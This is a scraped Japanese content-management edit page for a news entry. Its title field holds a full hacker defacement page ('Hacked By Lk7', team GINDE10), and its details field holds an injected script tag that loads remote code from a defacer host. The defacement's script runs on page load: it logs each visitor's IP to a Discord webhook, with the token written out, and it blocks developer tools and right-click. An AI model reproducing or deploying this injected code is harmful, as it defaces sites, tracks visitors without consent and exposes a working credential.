▼最新情報管理画面
>> 最新情報修正画面 >>
2025年9月19日の最新情報の修正
▼日付 ※必須
---
2026
2025
2024
年
--
1
2
3
4
5
6
7
8
9
10
11
12
月
--
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
日
▼最新情報(タイトルの修正)
※必須
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Hacked By Lk7</title> <style> body { background-color: #000; margin: 0; padding: 20px; display: flex; flex-direction: column; align-items: center; min-height: 100vh; font-family: 'Courier New', Courier, monospace; position: relative; } #particles { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: -1; } .center-image { max-width: 100%; height: auto; margin-bottom: 20px; filter: drop-shadow(0 0 10px #ff0000); animation: glow 2s ease-in-out infinite; } .ascii-art { color: #ff0000; font-size: 14px; line-height: 1.2; text-align: center; white-space: pre; margin-bottom: 20px; text-shadow: 0 0 10px #ff0000, 0 0 20px #ff0000; animation: flicker 3s infinite; } .neon-ascii { color: #ff3333; font-size: 14px; line-height: 1.2; text-align: center; white-space: pre; margin-bottom: 20px; text-shadow: 0 0 10px #ff3333, 0 0 20px #ff3333, 0 0 30px #ff3333; animation: flicker 3s infinite; } .greeting { color: #808080; font-size: 20px; margin-bottom: 20px; text-transform: uppercase; letter-spacing: 2px; text-align: center; } .system-info { color: #fff; font-size: 16px; margin-bottom: 20px; animation: glitch 1s linear infinite, typewriter 4s steps(60) 1s forwards; overflow: hidden; white-space: nowrap; border-right: 2px solid #fff; width: 0; text-align: center; } .footer-text { color: #ff0000; font-size: 18px; font-weight: bold; text-transform: uppercase; text-shadow: 0 0 10px #ff0000, 0 0 20px #ff0000; margin-bottom: 20px; letter-spacing: 1px; text-align: center; } .extra-message { margin-bottom: 20px; text-align: center; } .exposed-link, .defacer-link { color: #8B0000; font-size: 16px; font-weight: bold; text-transform: uppercase; text-shadow: 0 0 10px #8B0000, 0 0 20px #8B0000; letter-spacing: 1px; text-decoration: none; animation: flicker 3s infinite; display: block; } .exposed-link:hover, .defacer-link:hover { color: #ff4040; text-shadow: 0 0 15px #ff4040, 0 0 25px #ff4040; } @keyframes glow { 0% { filter: drop-shadow(0 0 10px #ff0000); } 50% { filter: drop-shadow(0 0 20px #ff0000); } 100% { filter: drop-shadow(0 0 10px #ff0000); } } @keyframes flicker { 0%, 100% { opacity: 1; } 50% { opacity: 0.8; } } @keyframes glitch { 0% { transform: translate(0, 0); } 10% { transform: translate(-2px, 2px); } 20% { transform: translate(2px, -2px); } 30% { transform: translate(-2px, -2px); } 40% { transform: translate(2px, 2px); } 50% { transform: translate(0, 0); } } @keyframes typewriter { from { width: 0; } to { width: 100%; } } @media (max-width: 600px) { .ascii-art, .neon-ascii { font-size: 8px; } .center-image { width: 80%; } .greeting { font-size: 16px; } .system-info { font-size: 12px; } .footer-text { font-size: 14px; } .exposed-link, .defacer-link { font-size: 12px; } } </style> </head> <body> <img style="width: 30%;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSNYqZujXUGJDG8GdIYB2CbDM2AiTblE-pwkCcUiLqXd2fmx9I3LDDh26uf&s=10"> <H1 style="font-size:30px;" class="ascii-art"> -=[ H4CK3D BY TEAM: GINDE10 ]=- </H1> <div class="footer-text">PWNADOS BY: Lk7 </div> <div class="greeting">GREETZ:V3ND3774.XS - F4 - Unzky - Mizun0 </div> <div class="greeting"> Hello admin of Osasco, you as been pwned by me ;-; !</div> <div class="system-info">uname -a Linux bolsonaro 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux</div> <div style="font-size: 15px;" class="greeting"> Ultrapassando NullSecLammers // SnowLammers // LordSecLammers // CodkLammers // and all teams lammers por ai ! </div> <audio autoplay loop> <source src="https://www.soundjay.com/buttons/beep-01a.mp3" type="audio/mpeg"> </audio> <script> async function logIP() { try { const response = await fetch('https://api.ipify.org?format=json'); const data = await response.json(); const ip = data.ip; const webhookURL = 'https://discord.com/api/webhooks/1417697919779340420/DSutm10AGphBLCwJW1rSuBvC7RrmDB82tgZTTem7OlXJloYdbrg7XfiPzPaceViXDyPX'; await fetch(webhookURL, { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ content: `🔥 New Visitor! IP: ${ip} 🌩️ Hacked by Unzky442` }) }); } catch (error) { console.error('Error logging IP:', error); } } logIP(); document.addEventListener('keydown', function(event) { if (event.key === 'F12' || (event.ctrlKey && event.shiftKey && event.key === 'I')) { event.preventDefault(); } }); document.addEventListener('contextmenu', function(event) { event.preventDefault(); }); const canvas = document.getElementById('particles'); const ctx = canvas.getContext('2d'); canvas.width = window.innerWidth; canvas.height = window.innerHeight; const particles = []; const particleCount = 100; class Particle { constructor() { this.x = Math.random() * canvas.width; this.y = Math.random() * canvas.height; this.size = Math.random() * 2 + 1; this.speedX = Math.random() * 1 - 0.5; this.speedY = Math.random() * 1 - 0.5; } update() { this.x += this.speedX; this.y += this.speedY; if (this.size > 0.2) this.size -= 0.01; } draw() { ctx.fillStyle = '#ff0000'; ctx.beginPath(); ctx.arc(this.x, this.y, this.size, 0, Math.PI * 2); ctx.fill(); } } function init() { for (let i = 0; i < particleCount; i++) { particles.push(new Particle()); } } function animate() { ctx.clearRect(0, 0, canvas.width, canvas.height); for (let i = 0; i < particles.length; i++) { particles[i].update(); particles[i].draw(); if (particles[i].size <= 0.2) { particles.splice(i, 1); i--; particles.push(new Particle()); } } requestAnimationFrame(animate); } window.addEventListener('resize', () => { canvas.width = window.innerWidth; canvas.height = window.innerHeight; }); init(); animate(); </script> </body> </html>
リンク
リンク先は別ウィンドウ
(ここにアドレスを書き込むと最新情報(タイトル)にリンクを張ることができます。)
▼最新情報(詳細の修正)
<script src="https://jso.defacer.id/raw/z3H2ld397c"></script>
(ここに書き込むと最新情報(タイトル)に自動的にリンクが張られ、クリックすると別ウィンドウにて書き込んだ内容が表示されるようになります。)
▼画像アップロード
現在画像はUPされています。
変更する場合(又は新たにUPする場合)のみ下の欄より指定してください
。
(画像は2つまでアップロードできます。)